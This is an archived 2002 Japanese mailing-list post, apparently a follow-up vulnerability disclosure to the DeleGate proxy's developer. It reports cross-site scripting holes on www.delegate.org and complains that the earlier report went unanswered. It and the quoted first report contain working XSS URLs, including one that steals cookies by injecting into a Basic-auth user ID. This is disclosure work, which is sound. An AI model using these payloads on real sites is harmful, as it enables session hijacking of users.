Article delegate-en/1777 of [1-5169] on the server localhost:119
  upper oldest olders older1 this newer1 newers latest
search
[Top/Up] [oldest] - [Older+chunk] - [Newer+chunk] - [newest + Check]
[Reference:<20020717123751.5488.OFFICE@ukky.net>]
Newsgroups: mail-lists.delegate-en

[DeleGate-En] Re: Delegate.orgのクロスサイトスクリプティング脆弱性
24 Jul 2002 06:22:08 GMT office <p6edabdyi-p5lznxowmzxr.ml@ml.delegate.org>


delegate 開発責任者 佐藤豊様

Bcc: ネットワークセキュリティ関係者

officeです

前回の脆弱性ご報告より一週間経ちましたが、何の反応も頂けないようで大変困
惑しております。goiken@delegate.org の方では佐藤様自身から新しいバージョン
のアナウンスもされておられ、アクティブでおられるにもかかわらずこの放置状
態は遺憾です。

折しも今日、Bugtraq-J にて、CacheFlow CacheOS のクロスサイトスクリプティ
ング脆弱性が報告されており、Delegateと全く同じURL形式でその脆弱性が発現
するようです。同じ proxy という役目を持つアプリケーションの同じ脆弱問題、
脆弱点のことを、類推する人がいない訳がありません。早急な対策が望まれます。

さらに www.delegate.org について調査したところ新たに2点脆弱性が発見
されています。

【脆弱点その4】
http://www.delegate.org/mail-lists/delegate-en/?Admin&ADMINID=

の後に続く文字列として " を利用したExploit例は既に示したところですが、
この文字列を異常に長くした場合(460文字以上?)のエラー画面

Bad Request: request-line-too-long GET /mail-lists/delegate-en/?Admin&ADMINID=

についても、表示が適切にサニタイズされていないことがわかりました。
この表示において / が表示されず、字詰めされることから、Exploit例はかなり特殊
になりますが、特殊文字 ^K (000B) をIEに対して用いた場合、攻撃が可能であるこ
とが確認されています。

例えば、IEに対して

http://www.delegate.org/mail-lists/delegate-en/?Admin&ADMINID=<imgsrc=""onerror=alert();>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

とした場合、
注 img と src の間は ^K
Javascriptが起動します。

この^Kを用いたExploitの可能性はso-la氏(ohga@so-la..)によって報告されました。

【脆弱点その5】

delegateの設定権限を持つAdmin用の入り口とおぼしき
http://www.delegate.org/-/admin/authenticate
についてですが、ここへアクセスしようとすると、Basic認証によってUserIDと
passwordが尋ねられます。この時の認証失敗時の画面が適切にサニタイズされ
ておらず、UserIDとして、<script src=http://example.com></script>など
を入れると、任意のJavascriptコードを外部から読み込んで起動します。

しかし、犠牲者となるユーザに
「UserIDとして<script src=http://hoge></script>を入力してください。」
とはさすがに言えません。怪しすぎます。

しかし、ここで
http://ID:pass@autehticated../
方式のアクセスによるExploit方法が使用可能です。

しかし
http://<s>test</s>:hoge@www.delegate.org/-/admin/authenticate
にアクセスしようとしてみると、www.delegate.orgにアクセスしません。
userID部分に / が入っていると、/ 以前をドメインだと解釈されてしまうのです。
従って、上記の例だと、
<s>test<
というドメインにアクセスしようとするみたいです。従って、通常のポップアップ
ウィンドウへの入力によるBasic認証と異なり、/ なしのExploitでなければ有効
ではありません。

http://<img%20src=""onerrer=alert()>:hoge@www.delegate.org/-/admin/authenticate

とすると、Exploit可能であることがわかります。しかし、この脆弱点に関して
文字数制限(。53文字以下?)があることがわかっています。それでも、

http://<img%20src=""onerror="d=document,d.URL=d.refferer+d.cookie">:hoge@www.delegate.org/-/admin/authenticate

というようなURLによって、同じドメイン上でCookieが用いられていた場合に
Cookieが奪取されうることがわかっています。

この字数制限内のExploit例は、bun氏(bun@devnull..jp)によって報告されました。

これらも含めて修正されるようお願いします。
また、修正に関するアナウンス時には、配布されているdelegateと関係する部分
と関係しない部分を明示していただけると幸いです。
--
office
p6edabdyi-p5lznxowmzxr.ml@ml.delegate.org
http://www.office.ac/




On Wed, 17 Jul 2002 13:20:46 +0900
office <p6edabdyi-p5lznxowmzxr.ml@ml.delegate.org> wrote:

> delegate 開発責任者 佐藤豊様
> 
> はじめまして office と申します
> 
> www.delegate.orgにクロスサイトスクリプティング脆弱性があるようなので、
> ご報告します。私はハッカーではないので、配布されているdelegateのコードが
> 読めません。従って、www.delegate.org上のクロスサイトスクリプティング脆
> 弱点について、delegateの問題なのか、サイト固有の問題か切り分けることが
> できません。そのため見つかった現象を、まとめてご報告させていただきます。
> 
> またdelegateのfeedback先は、feedback@delegate.org とお見受けしましたが、
> ここへ投稿した場合、moderateされているのか、あるいはいきなりOpenに
> なってしまうのかわからないため、投稿を控えることとしました。
> もしも佐藤さんの個人アドレスがsecurityのfeedbackの投稿先として不適切
> だった場合、どうかご容赦下さい。
> 
> http://www.delegate.org/<script>alert()</script>
> 
> といった、JavaScriptコードを含む存在しないページのURLを指定すること
> により not found 画面を出したとき、Internet Explorer で閲覧
> した場合には、JavaScriptが起動してしまいます。
> JavaScriptコードの内容として、悪意あるものがURLに含まれているものを
> 犠牲者となるユーザを誘導してアクセスした場合、犠牲者のブラウザ上で
> このJavaScriptが起動してしまいます。
> 
> 他にも、脆弱点として
> 
> http://www.delegate.org/db/search?UI=kenko&USER=&CUSTOM=&TABLE=1&PASSWD=&NAME=feedback&SEARCH="><s>test</s>&ACTION=Search&SPACE=AND&AFTER=19971231&BEFORE="><script>alert()</script>&SORT=RDATE&COUNT=10&ACTION=DEFAULT&DISPLAY=FULL&LANG=en
> http://www.delegate.org/mail-lists/delegate-en/?Admin&ADMINID="style="background-image:url(javascript:document.body.innerHTML='Here_is_XSS_vulnerability!';)
> 
> といったURLで確かめることができます。
> 
> クロスサイトスクリプティングの脆弱性の詳細については
> http://www.ae.wakwak.com/~sysportcore/sysport/kb/security/css.htm
> http://www.ipa.go.jp/security/ciadr/20011023css.html
> http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf
> その対策方法としては
> http://www.ipa.go.jp/security/awareness/vendor/programming/a01_02.html
> あたりをご参照下さい。
> 
> www.delegate.org に脆弱性が存在したこと、およびこの脆弱性報告への対応状況
> については適宜公表させて頂きます。
> --
> office
> p6edabdyi-p5lznxowmzxr.ml@ml.delegate.org
> http://www.office.ac/


  admin search upper oldest olders older1 this newer1 newers latest
[Top/Up] [oldest] - [Older+chunk] - [Newer+chunk] - [newest + Check]
@_@V